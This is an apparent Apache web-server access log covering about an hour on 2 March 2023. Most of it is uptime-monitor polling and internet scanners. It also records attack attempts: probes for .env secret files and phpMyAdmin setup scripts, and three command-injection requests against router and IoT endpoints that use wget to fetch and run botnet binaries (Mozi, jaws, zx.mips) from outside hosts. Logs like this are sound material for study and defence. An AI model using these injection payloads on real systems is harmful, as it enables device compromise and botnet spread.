212.91.246.72 - - [02/Mar/2023:18:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.141.6.170 - - [02/Mar/2023:18:23:41 +0100] "GET /wp-admin/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [02/Mar/2023:18:23:41 +0100] "POST /wp-admin HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:23:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:24:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:18:25:35 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Mar/2023:18:25:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:26:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:27:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:28:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.131.24 - - [02/Mar/2023:18:29:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [02/Mar/2023:18:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:30:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.203.57.1 - - [02/Mar/2023:18:31:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
162.142.125.221 - - [02/Mar/2023:18:31:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.221 - - [02/Mar/2023:18:31:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.221 - - [02/Mar/2023:18:31:16 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.221 - - [02/Mar/2023:18:31:16 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2023:18:31:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.144 - - [02/Mar/2023:18:32:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
179.43.177.242 - - [02/Mar/2023:18:32:33 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [02/Mar/2023:18:32:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.145 - - [02/Mar/2023:18:33:08 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0"
212.91.246.72 - - [02/Mar/2023:18:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.145 - - [02/Mar/2023:18:34:34 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70"
212.91.246.72 - - [02/Mar/2023:18:34:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.74.240.14 - - [02/Mar/2023:18:36:00 +0100] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [02/Mar/2023:18:36:01 +0100] "POST /library HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:36:16 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:36:16 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:36:25 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:36:26 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:36:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
188.119.51.126 - - [02/Mar/2023:18:37:04 +0100] "GET /protected/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.119.51.126 - - [02/Mar/2023:18:37:05 +0100] "POST /protected HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:37:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.74.240.14 - - [02/Mar/2023:18:37:51 +0100] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [02/Mar/2023:18:37:52 +0100] "POST /library HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.74.240.14 - - [02/Mar/2023:18:39:08 +0100] "GET /library/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
27.74.240.14 - - [02/Mar/2023:18:39:08 +0100] "POST /library HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:39:13 +0100] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:18:39:13 +0100] "POST /backend HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:39:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:18:39:59 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.225.45.232 - - [02/Mar/2023:18:40:37 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.225.45.232 - - [02/Mar/2023:18:40:39 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:40:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:41:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:42:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:43:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:44:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:45:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.176.222.187 - - [02/Mar/2023:18:45:51 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://178.176.222.187:39801/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [02/Mar/2023:18:46:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.13.125.214 - - [02/Mar/2023:18:46:59 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
218.28.124.102 - - [02/Mar/2023:18:47:15 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
185.225.45.232 - - [02/Mar/2023:18:47:43 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.225.45.232 - - [02/Mar/2023:18:47:46 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:47:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:48:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:49:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:50:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.32.162.159 - - [02/Mar/2023:18:50:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/Mar/2023:18:51:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.225.45.232 - - [02/Mar/2023:18:52:43 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.225.45.232 - - [02/Mar/2023:18:52:47 +0100] "POST /conf HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:52:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:53:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:54:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:55:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
131.255.59.106 - - [02/Mar/2023:18:55:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:18:56:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:57:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:58:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:18:59:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //SQL/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //db/scripts/setup.php HTTP/1.1" 404 325 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:54 +0100] "GET //dbadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:55 +0100] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:55 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:55 +0100] "GET //pHpMyAdMiN/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:55 +0100] "GET //pMA/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //phpAdmin/scripts/setup.php HTTP/1.1" 404 331 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //sql/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //mysql/scripts/setup.php HTTP/1.1" 404 328 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
193.42.33.140 - - [02/Mar/2023:18:59:56 +0100] "GET //MySQLAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
212.91.246.72 - - [02/Mar/2023:19:00:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:01:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:02:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:03:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.183.136.106 - - [02/Mar/2023:19:06:29 +0100] "GET /blogs/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:06:29 +0100] "POST /blogs HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:06:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.177.242 - - [02/Mar/2023:19:07:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [02/Mar/2023:19:07:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.183.136.106 - - [02/Mar/2023:19:08:25 +0100] "GET /blogs/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:08:25 +0100] "POST /blogs HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:08:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
67.183.136.106 - - [02/Mar/2023:19:09:44 +0100] "GET /blogs/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.134 - - [02/Mar/2023:19:09:44 +0100] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
67.183.136.106 - - [02/Mar/2023:19:09:44 +0100] "POST /blogs HTTP/1.1" 404 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.134 - - [02/Mar/2023:19:09:44 +0100] "POST /docs HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:09:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:10:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.17.224.134 - - [02/Mar/2023:19:11:06 +0100] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.134 - - [02/Mar/2023:19:11:06 +0100] "POST /docs HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [02/Mar/2023:19:11:08 +0100] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [02/Mar/2023:19:11:09 +0100] "POST /laravel HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
172.91.47.43 - - [02/Mar/2023:19:11:15 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
41.251.249.88 - - [02/Mar/2023:19:11:19 +0100] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [02/Mar/2023:19:11:20 +0100] "POST /laravel HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:11:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.17.224.134 - - [02/Mar/2023:19:11:59 +0100] "GET /docs/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
4.17.224.134 - - [02/Mar/2023:19:11:59 +0100] "POST /docs HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:12:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:13:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.251.249.88 - - [02/Mar/2023:19:14:40 +0100] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
41.251.249.88 - - [02/Mar/2023:19:14:41 +0100] "POST /laravel HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:14:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:16:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:17:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:18:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2023:19:20:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.60.150.14 - - [02/Mar/2023:19:21:10 +0100] "GET /main/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
139.60.150.14 - - [02/Mar/2023:19:21:10 +0100] "POST /main HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:21:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.157.23.94 - - [02/Mar/2023:19:22:33 +0100] "GET /blog/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.94 - - [02/Mar/2023:19:22:33 +0100] "POST /blog HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2023:19:22:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.32.164.145 - - [02/Mar/2023:19:23:00 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [02/Mar/2023:19:23:00 +0100] "POST /newsite HTTP/1.1" 404 312 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.32.164.145 - - [02/Mar/2023:19:23:09 +0100] "GET /newsite/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
